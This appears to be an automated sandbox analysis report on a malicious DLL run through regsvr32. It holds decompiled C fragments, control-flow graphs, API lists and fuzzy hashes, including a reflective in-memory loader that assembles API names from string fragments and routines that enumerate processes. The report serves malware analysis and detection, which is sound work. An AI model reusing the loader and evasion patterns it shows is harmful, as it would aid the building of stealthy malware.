                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                • String ID:
                                                                                                • API String ID: 2718003287-0
                                                                                                • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 28%
                                                                                                			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}







































                                                                                                0x18000dee0
                                                                                                0x18000dee0
                                                                                                0x18000def6
                                                                                                0x18000defc
                                                                                                0x18000deff
                                                                                                0x18000df05
                                                                                                0x18000df0e
                                                                                                0x18000df10
                                                                                                0x18000df15
                                                                                                0x18000df18
                                                                                                0x18000df1e
                                                                                                0x18000df25
                                                                                                0x18000df2d
                                                                                                0x18000df30
                                                                                                0x18000df35
                                                                                                0x18000df3a
                                                                                                0x18000df42
                                                                                                0x18000df57
                                                                                                0x18000df5b
                                                                                                0x18000df5f
                                                                                                0x18000df67
                                                                                                0x18000df6c
                                                                                                0x18000df73
                                                                                                0x18000df7c
                                                                                                0x18000df84
                                                                                                0x18000df8b
                                                                                                0x18000df8b
                                                                                                0x18000df8f
                                                                                                0x18000df97
                                                                                                0x18000dfa9
                                                                                                0x18000dfb8
                                                                                                0x18000dfc2
                                                                                                0x18000dfc7
                                                                                                0x18000dfde
                                                                                                0x18000dfe0
                                                                                                0x18000dfe9
                                                                                                0x18000e004
                                                                                                0x18000e00a
                                                                                                0x18000e00e
                                                                                                0x18000e010
                                                                                                0x18000e019
                                                                                                0x18000e01e
                                                                                                0x18000e024
                                                                                                0x18000e028
                                                                                                0x18000e02c
                                                                                                0x18000e032
                                                                                                0x18000e034
                                                                                                0x18000e03f
                                                                                                0x18000e043
                                                                                                0x18000e048
                                                                                                0x18000e04f
                                                                                                0x18000e051
                                                                                                0x18000e055
                                                                                                0x18000e05d
                                                                                                0x18000e071
                                                                                                0x18000e073
                                                                                                0x18000e076
                                                                                                0x18000e083
                                                                                                0x18000e085
                                                                                                0x18000e08d
                                                                                                0x18000e090
                                                                                                0x18000e094
                                                                                                0x18000e099
                                                                                                0x18000e09c
                                                                                                0x18000e0ab
                                                                                                0x18000e0b0
                                                                                                0x18000e0b7
                                                                                                0x18000e0cc
                                                                                                0x18000e0ce
                                                                                                0x18000e0d2
                                                                                                0x18000e0d4
                                                                                                0x18000e0d9
                                                                                                0x18000e0de
                                                                                                0x18000e0e4
                                                                                                0x18000e0f1
                                                                                                0x18000e0f6
                                                                                                0x18000e0f8
                                                                                                0x18000e105
                                                                                                0x18000e10a
                                                                                                0x18000e10c
                                                                                                0x18000e119
                                                                                                0x18000e11e
                                                                                                0x18000e12b
                                                                                                0x18000e12e
                                                                                                0x18000e136
                                                                                                0x18000e13a
                                                                                                0x18000e145
                                                                                                0x18000e147
                                                                                                0x18000e14d
                                                                                                0x18000e153
                                                                                                0x18000e158
                                                                                                0x18000e16e
                                                                                                0x18000e170
                                                                                                0x18000e175
                                                                                                0x18000e17a
                                                                                                0x18000e17c
                                                                                                0x18000e180
                                                                                                0x18000e187
                                                                                                0x18000e18b
                                                                                                0x18000e18e
                                                                                                0x18000e196
                                                                                                0x18000e199
                                                                                                0x18000e19e
                                                                                                0x18000e1ad
                                                                                                0x18000e1b2
                                                                                                0x18000e1b4
                                                                                                0x18000e1b8
                                                                                                0x18000e1bc
                                                                                                0x18000e1c3
                                                                                                0x18000e1c7
                                                                                                0x18000e1d1
                                                                                                0x18000e1e5

                                                                                                APIs
                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                • String ID:
                                                                                                • API String ID: 953036326-0
                                                                                                • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 29%
                                                                                                			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xeaed15642a89
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}














                                                                                                0x18000dc50
                                                                                                0x18000dc55
                                                                                                0x18000dc67
                                                                                                0x18000dc6f
                                                                                                0x18000dc79
                                                                                                0x18000dc8a
                                                                                                0x18000dc98
                                                                                                0x18000dc9c
                                                                                                0x18000dcb4
                                                                                                0x18000dcba
                                                                                                0x18000dcbd
                                                                                                0x18000dcc3
                                                                                                0x18000dccb
                                                                                                0x18000dccd
                                                                                                0x18000dcd8
                                                                                                0x18000dcdf
                                                                                                0x18000dce2
                                                                                                0x18000dce6
                                                                                                0x18000dcf8
                                                                                                0x18000dcfa
                                                                                                0x18000dd05
                                                                                                0x18000dd13
                                                                                                0x18000dd26
                                                                                                0x18000dd2b
                                                                                                0x18000dd35
                                                                                                0x18000dd3e
                                                                                                0x18000dd44
                                                                                                0x18000dd46
                                                                                                0x18000dd5b
                                                                                                0x18000dd64
                                                                                                0x18000dd6f
                                                                                                0x18000dd77
                                                                                                0x18000dd7e
                                                                                                0x18000dd84
                                                                                                0x18000dd8f
                                                                                                0x18000ddbf

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastWrite
                                                                                                • String ID: U
                                                                                                • API String ID: 442123175-4171548499
                                                                                                • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                • String ID: csm
                                                                                                • API String ID: 2573137834-1018135373
                                                                                                • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassCursorLoadRegister
                                                                                                • String ID: P
                                                                                                • API String ID: 1693014935-3110715001
                                                                                                • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:18.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:42
                                                                                                Total number of Limit Nodes:4
                                                                                                execution_graph 3043 1210000 3046 121015a 3043->3046 3044 121033f GetNativeSystemInfo 3045 1210377 VirtualAlloc 3044->3045 3048 12108eb 3044->3048 3047 1210395 VirtualAlloc 3045->3047 3052 12103aa 3045->3052 3046->3044 3046->3048 3047->3052 3049 1210873 3049->3048 3050 12108c6 RtlAddFunctionTable 3049->3050 3050->3048 3051 121084b VirtualProtect 3051->3052 3052->3049 3052->3051 3053 2b1a7f0 3054 2b1a80b 3053->3054 3055 2b1a8bc 3054->3055 3057 2b2020c 3054->3057 3060 2b2022b 3057->3060 3059 2b20590 3059->3055 3060->3059 3061 2b2e310 3060->3061 3063 2b2e423 3061->3063 3062 2b2e5f6 3062->3060 3063->3062 3065 2b140a0 3063->3065 3066 2b14116 3065->3066 3067 2b141ca GetVolumeInformationW 3066->3067 3067->3062 3075 2b32ab0 3077 2b32aea 3075->3077 3076 2b32c51 3077->3076 3079 2b2e9e8 3077->3079 3080 2b18bc8 Process32FirstW 3079->3080 3081 2b2eab4 3080->3081 3081->3077 3068 2b2e9e8 3071 2b18bc8 3068->3071 3070 2b2eab4 3073 2b18c02 3071->3073 3072 2b18eb8 3072->3070 3073->3072 3074 2b18d6f Process32FirstW 3073->3074 3074->3073 3086 2b180cc 3088 2b180f3 3086->3088 3087 2b182ba 3088->3087 3089 2b2e9e8 Process32FirstW 3088->3089 3089->3088 3082 2b3488c 3084 2b348d6 3082->3084 3083 2b2e9e8 Process32FirstW 3083->3084 3084->3083 3085 2b34914 3084->3085

                                                                                                Executed Functions

                                                                                                Function 01210000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 1210000-121029a call 121091c * 2 13 12102a0-12102a4 0->13 14 1210905 0->14 13->14 16 12102aa-12102ae 13->16 15 1210907-121091a 14->15 16->14 17 12102b4-12102b8 16->17 17->14 18 12102be-12102c5 17->18 18->14 19 12102cb-12102dc 18->19 19->14 20 12102e2-12102eb 19->20 20->14 21 12102f1-12102fc 20->21 21->14 22 1210302-1210312 21->22 23 1210314-121031a 22->23 24 121033f-1210371 GetNativeSystemInfo 22->24 25 121031c-1210324 23->25 24->14 26 1210377-1210393 VirtualAlloc 24->26 27 1210326-121032a 25->27 28 121032c-121032d 25->28 29 1210395-12103a8 VirtualAlloc 26->29 30 12103aa-12103ae 26->30 31 121032f-121033d 27->31 28->31 29->30 32 12103b0-12103c2 30->32 33 12103dc-12103e3 30->33 31->24 31->25 36 12103d4-12103d8 32->36 34 12103e5-12103f9 33->34 35 12103fb-1210417 33->35 34->34 34->35 37 1210419-121041a 35->37 38 1210458-1210465 35->38 39 12103c4-12103d1 36->39 40 12103da 36->40 41 121041c-1210422 37->41 42 1210537-1210542 38->42 43 121046b-1210472 38->43 39->36 40->35 44 1210424-1210446 41->44 45 1210448-1210456 41->45 46 12106e6-12106ed 42->46 47 1210548-1210559 42->47 43->42 48 1210478-1210485 43->48 44->44 44->45 45->38 45->41 51 12106f3-1210707 46->51 52 12107ac-12107c3 46->52 49 1210562-1210565 47->49 48->42 50 121048b-121048f 48->50 53 1210567-1210574 49->53 54 121055b-121055f 49->54 55 121051b-1210525 50->55 56 12107a9-12107aa 51->56 57 121070d 51->57 58 12107c9-12107cd 52->58 59 121087a-121088d 52->59 62 121057a-121057d 53->62 63 121060d-1210619 53->63 54->49 60 1210494-12104a8 55->60 61 121052b-1210531 55->61 56->52 64 1210712-1210736 57->64 65 12107d0-12107d3 58->65 83 12108b3-12108ba 59->83 84 121088f-121089a 59->84 68 12104aa-12104cd 60->68 69 12104cf-12104d3 60->69 61->42 61->50 62->63 70 1210583-121059b 62->70 66 12106e2-12106e3 63->66 67 121061f 63->67 95 1210796-121079f 64->95 96 1210738-121073e 64->96 72 12107d9-12107e9 65->72 73 121085f-121086d 65->73 66->46 76 1210625-1210648 67->76 78 1210518-1210519 68->78 79 12104e3-12104e7 69->79 80 12104d5-12104e1 69->80 70->63 81 121059d-121059e 70->81 74 12107eb-12107ed 72->74 75 121080d-121080f 72->75 73->65 77 1210873-1210874 73->77 85 12107fb-121080b 74->85 86 12107ef-12107f9 74->86 87 1210811-1210820 75->87 88 1210822-121082b 75->88 110 12106b2-12106b7 76->110 111 121064a-121064b 76->111 77->59 78->55 93 12104e9-12104fc 79->93 94 12104fe-1210502 79->94 91 1210511-1210515 80->91 92 12105a0-1210605 81->92 89 12108eb-1210903 83->89 90 12108bc-12108c4 83->90 97 12108ab-12108b1 84->97 99 121082e-121083d 85->99 86->99 87->99 88->99 89->15 90->89 105 12108c6-12108e9 RtlAddFunctionTable 90->105 91->78 92->92 100 1210607 92->100 93->91 94->78 98 1210504-121050e 94->98 95->64 106 12107a5-12107a6 95->106 101 1210740-1210746 96->101 102 1210748-1210754 96->102 97->83 103 121089c-12108a8 97->103 98->91 112 121084b-121085c VirtualProtect 99->112 113 121083f-1210845 99->113 100->63 107 121077b-121078d 101->107 108 1210764-1210776 102->108 109 1210756-1210757 102->109 103->97 105->89 106->56 107->95 126 121078f-1210794 107->126 108->107 118 1210759-1210762 109->118 115 12106b9-12106bd 110->115 116 12106ce-12106d8 110->116 119 121064e-1210651 111->119 112->73 113->112 115->116 120 12106bf-12106c3 115->120 116->76 121 12106de-12106df 116->121 118->108 118->118 123 1210653-1210659 119->123 124 121065b-1210666 119->124 120->116 125 12106c5 120->125 121->66 127 121068d-12106a3 123->127 128 1210676-1210688 124->128 129 1210668-1210669 124->129 125->116 126->96 132 12106a5-12106aa 127->132 133 12106ac 127->133 128->127 130 121066b-1210674 129->130 130->128 130->130 132->119 133->110
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.579411297.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_1210000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                • API String ID: 394283112-3605381585
                                                                                                • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction ID: 7aa6a759d099c5766bd0dc881daa94cff757a99f40a67ba070365b28669cfb52
                                                                                                • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction Fuzzy Hash: C6522530628B498FD719DF18D8857BAB7E1FB94300F14462DE98BC7255DB34E482CB8A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02B140A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 401 2b140a0-2b14136 call 2b29f38 404 2b141ca-2b14202 GetVolumeInformationW 401->404 405 2b1413c-2b141c4 call 2b1a940 401->405 405->404
                                                                                                APIs
                                                                                                • GetVolumeInformationW.KERNELBASE ref: 02B141EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_2b11000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationVolume
                                                                                                • String ID: Ql$v[
                                                                                                • API String ID: 2039140958-138011117
                                                                                                • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                • Instruction ID: b2f1d97a8f18ca4904020a28041ede87533b42def9c4cdd1dbc509cc71f1630d
                                                                                                • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                • Instruction Fuzzy Hash: 2C313A7051CB848BD7B8DF18D48579AB7E1FB88315F60895DE88CC7295CF789888CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%